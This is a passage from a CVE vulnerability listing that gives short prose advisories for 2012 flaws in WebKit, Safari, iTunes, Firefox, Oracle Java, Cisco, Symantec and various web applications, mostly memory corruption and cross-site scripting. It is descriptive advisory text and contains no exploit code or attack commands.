and BPM before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0683] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-0682] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-0678] Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML via a feed:// URL. [CVE-2012-0676] WebKit in Apple Safari before 5.1.7 does not properly track state information during the processing of form input, which allows remote attackers to fill in form fields on the pages of arbitrary web sites via unspecified vectors. [CVE-2012-0674] Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the location bar's URL via a crafted web site. [CVE-2012-0672] WebKit in Apple iOS before 5.1.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. [CVE-2012-0648] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2012-0647] WebKit in Apple Safari before 5.1.4 does not properly handle redirects in conjunction with HTTP authentication, which might allow remote web servers to capture credentials by logging the Authorization HTTP header. [CVE-2012-0640] WebKit in Apple Safari before 5.1.4 does not properly implement "From third parties and advertisers" cookie blocking, which makes it easier for remote web servers to track users via a cookie. [CVE-2012-0639] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2012-0638] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2012-0637] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2012-0636] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2012-0635] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0634] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1. [CVE-2012-0633] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0632] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0631] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0630] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0629] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0628] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0627] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0626] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0625] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0624] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0623] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0622] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0621] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0620] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0619] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0618] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0617] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0616] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0615] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0614] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0613] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0612] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0611] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0610] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0609] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0608] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0607] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0606] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0605] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0604] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0603] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0602] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0601] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0600] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0599] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0598] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0597] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0596] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0595] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0594] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0593] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0592] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0591] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2. [CVE-2012-0590] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a drag-and-drop operation. [CVE-2012-0589] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0586, CVE-2012-0587, and CVE-2012-0588. [CVE-2012-0588] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0586, CVE-2012-0587, and CVE-2012-0589. [CVE-2012-0587] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0586, CVE-2012-0588, and CVE-2012-0589. [CVE-2012-0586] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0587, CVE-2012-0588, and CVE-2012-0589. [CVE-2012-0582] Unspecified vulnerability in the Siebel Clinical component in Oracle Industry Applications 7.7, 7.8, 8.0.0.x, 8.1.1.x, and 8.2.2.x allows remote authenticated users to affect integrity via unknown vectors related to Web UI. [CVE-2012-0558] Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 6.2.1, 8.0, 8.1, and 8.2 allows remote attackers to affect integrity via unknown vectors related to Web application. [CVE-2012-0551] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE 7 update 4 and earlier and 6 update 32 and earlier, and the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Container or Deployment. [CVE-2012-0550] Unspecified vulnerability in the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Container. [CVE-2012-0516] Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration Console. [CVE-2012-0506] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to CORBA. [CVE-2012-0505] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Serialization. [CVE-2012-0503] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to I18n. [CVE-2012-0502] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and availability, related to AWT. [CVE-2012-0500] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and JavaFX 2.0.2 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page. [CVE-2012-0477] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allow remote attackers to inject arbitrary web script or HTML via the (1) ISO-2022-KR or (2) ISO-2022-CN character set. [CVE-2012-0475] Mozilla Firefox 4.x through 11.0, Thunderbird 5.0 through 11.0, and SeaMonkey before 2.9 do not properly construct the Origin and Sec-WebSocket-Origin HTTP headers, which might allow remote attackers to bypass an IPv6 literal ACL via a cross-site (1) XMLHttpRequest or (2) WebSocket operation involving a nonstandard port number and an IPv6 address that contains certain zero fields. [CVE-2012-0474] Cross-site scripting (XSS) vulnerability in the docshell implementation in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allows remote attackers to inject arbitrary web script or HTML via vectors related to short-circuited page loads, aka "Universal XSS (UXSS)." [CVE-2012-0473] The WebGLBuffer::FindMaxUshortElement function in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 calls the FindMaxElementInSubArray function with incorrect template arguments, which allows remote attackers to obtain sensitive information from video memory via a crafted WebGL.drawElements call. [CVE-2012-0471] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allows remote attackers to inject arbitrary web script or HTML via a multibyte character set. [CVE-2012-0466] template/en/default/list/list.js.tmpl in Bugzilla 2.x and 3.x before 3.6.9, 3.7.x and 4.0.x before 4.0.6, and 4.1.x and 4.2.x before 4.2.1 does not properly handle multiple logins, which allows remote attackers to conduct cross-site scripting (XSS) attacks and obtain sensitive bug information via a crafted web page. [CVE-2012-0455] Mozilla Firefox before 3.6.28 and 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird before 3.1.20 and 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 do not properly restrict drag-and-drop operations on javascript: URLs, which allows user-assisted remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web page, related to a "DragAndDropJacking" issue. [CVE-2012-0451] CRLF injection vulnerability in Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 allows remote web servers to bypass intended Content Security Policy (CSP) restrictions and possibly conduct cross-site scripting (XSS) attacks via crafted HTTP headers. [CVE-2012-0446] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 allow remote attackers to inject arbitrary web script or HTML via a (1) web page or (2) Firefox extension, related to improper enforcement of XPConnect security restrictions for frame scripts that call untrusted objects. [CVE-2012-0435] SUSE WebYaST before 1.2 0.2.63-0.6.1 allows remote attackers to modify the hosts list, and subsequently conduct man-in-the-middle attacks, via a crafted /host request on TCP port 4984. [CVE-2012-0428] Cross-site scripting (XSS) vulnerability in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0419] Directory traversal vulnerability in the agent HTTP interfaces in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 allows remote attackers to read arbitrary files via directory traversal sequences in a request. [CVE-2012-0411] Unspecified vulnerability in Novell iPrint Client before 5.82 allows remote attackers to execute arbitrary code via an op-client-interface-version action. [CVE-2012-0404] Cross-site scripting (XSS) vulnerability in EMC Documentum eRoom before 7.4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0399] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA enVision 4.x before 4.1 Patch 4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0389] Cross-site scripting (XSS) vulnerability in ForgottenPassword.aspx in MailEnable Professional, Enterprise, and Premium 4.26 and earlier, 5.x before 5.53, and 6.x before 6.03 allows remote attackers to inject arbitrary web script or HTML via the Username parameter. [CVE-2012-0370] Cisco Wireless LAN Controller (WLC) devices with software 4.x, 5.x, 6.0, and 7.0 before 7.0.220.0 and 7.1 before 7.1.91.0, when WebAuth is enabled, allow remote attackers to cause a denial of service (device reload) via a sequence of (1) HTTP or (2) HTTPS packets, aka Bug ID CSCtt47435. [CVE-2012-0368] The administrative management interface on Cisco Wireless LAN Controller (WLC) devices with software 4.x, 5.x, 6.0, and 7.0 before 7.0.220.0, 7.1 before 7.1.91.0, and 7.2 before 7.2.103.0 allows remote attackers to cause a denial of service (device crash) via a malformed URL in an HTTP request, aka Bug ID CSCts81997. [CVE-2012-0337] SQL injection vulnerability in the web component in Cisco Unified MeetingPlace 7.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtx08939. [CVE-2012-0328] Janetter before 3.3.0.0 (aka 3.3.0) allows remote attackers to obtain session information for twitter.com web sites via unspecified vectors. [CVE-2012-0327] Cross-site scripting (XSS) vulnerability in Redmine before 1.3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0325] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.454, Jenkins LTS before 1.424.5, and Jenkins Enterprise 1.400.x before 1.400.0.13 and 1.424.x before 1.424.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0324. [CVE-2012-0324] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.454, Jenkins LTS before 1.424.5, and Jenkins Enterprise 1.400.x before 1.400.0.13 and 1.424.x before 1.424.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0325. [CVE-2012-0323] Cross-site scripting (XSS) vulnerability in the Autocomplete plugin before 3.0 for SquirrelMail allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0318] Multiple cross-site scripting (XSS) vulnerabilities in Movable Type before 4.38, 5.0x before 5.07, and 5.1x before 5.13 allow remote attackers to inject arbitrary web script or HTML via vectors involving templates, a different issue than CVE-2012-1262. [CVE-2012-0316] The Cookpad 1.5.16 and earlier and Cookpad Noseru 1.1.1 and earlier applications for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-0313] Cross-site scripting (XSS) vulnerability in glucose 2 before stage 6.2 allows remote attackers to inject arbitrary web script or HTML via an RSS feed. [CVE-2012-0312] Cross-site scripting (XSS) vulnerability in osCommerce 2.2MS1J before R9, and osCommerce Online Merchant before 2.3.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0311] Cross-site scripting (XSS) vulnerability in osCommerce 2.2MS1J before R9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0309] Cross-site scripting (XSS) vulnerability in Cogent DataHub 7.1.2 and earlier, Cascade DataHub 6.4.20 and earlier, and OPC DataHub 6.4.20 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0307] Multiple cross-site scripting (XSS) vulnerabilities in Symantec Messaging Gateway (SMG) before 10.0 allow remote attackers to inject arbitrary web script or HTML via (1) web content or (2) e-mail content. [CVE-2012-0302] Cross-site scripting (XSS) vulnerability in Brightmail Control Center in Symantec Message Filter 6.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0301] Session fixation vulnerability in Brightmail Control Center in Symantec Message Filter 6.3 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2012-0299] The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors. [CVE-2012-0298] The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors. [CVE-2012-0297] The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data. [CVE-2012-0296] Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0287] Cross-site scripting (XSS) vulnerability in wp-comments-post.php in WordPress 3.3.x before 3.3.1, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via the query string in a POST operation that is not properly handled by the "Duplicate comment detected" feature. [CVE-2012-0286] Cross-site request forgery (CSRF) vulnerability in Stoneware webNetwork before 6.0.8.0 allows remote attackers to hijack the authentication of unspecified victims for requests that modify user accounts. [CVE-2012-0285] Multiple cross-site scripting (XSS) vulnerabilities in Stoneware webNetwork before 6.0.8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0283] Cross-site scripting (XSS) vulnerability in the tpl_mediaFileList function in inc/template.php in DokuWiki before 2012-01-25b allows remote attackers to inject arbitrary web script or HTML via the ns parameter in a medialist action to lib/exe/ajax.php. [CVE-2012-0272] Cross-site scripting (XSS) vulnerability in the WebAccess component in Novell GroupWise 8.0 before Support Pack 3 allows remote attackers to inject arbitrary web script or HTML via the merge parameter. [CVE-2012-0271] Integer overflow in the WebConsole component in gwia.exe in GroupWise Internet Agent (GWIA) in Novell GroupWise 8.0 before 8.0.3 HP1 and 2012 before SP1 might allow remote attackers to execute arbitrary code via a crafted request that triggers a heap-based buffer overflow, as demonstrated by a request with -1 in the Content-Length HTTP header. [CVE-2012-0254] Stack-based buffer overflow in the HMIWeb Browser HSCDSPRenderDLL ActiveX control in Honeywell Process Solutions (HPS) Experion R2xx, R30x, R31x, and R400.x [CVE-2012-0253] Multiple cross-site scripting (XSS) vulnerabilities in Demand Media Pluck SiteLife before 5.0.13 allow remote attackers to inject arbitrary web script or HTML via (1) the jsonRequest parameter to Direct/Process, the (2) r or (3) cb parameter to Direct/jsonp.htm, or (4) the cb parameter to sys/jsonp.app/.htm. [CVE-2012-0245] Multiple stack-based buffer overflows in RobNetScanHost.exe in ABB Robot Communications Runtime before 5.14.02, as used in ABB Interlink Module, IRC5 OPC Server, PC SDK, PickMaster 3 and 5, RobView 5, RobotStudio, WebWare SDK, and WebWare Server, allow remote attackers to execute arbitrary code via a crafted (1) 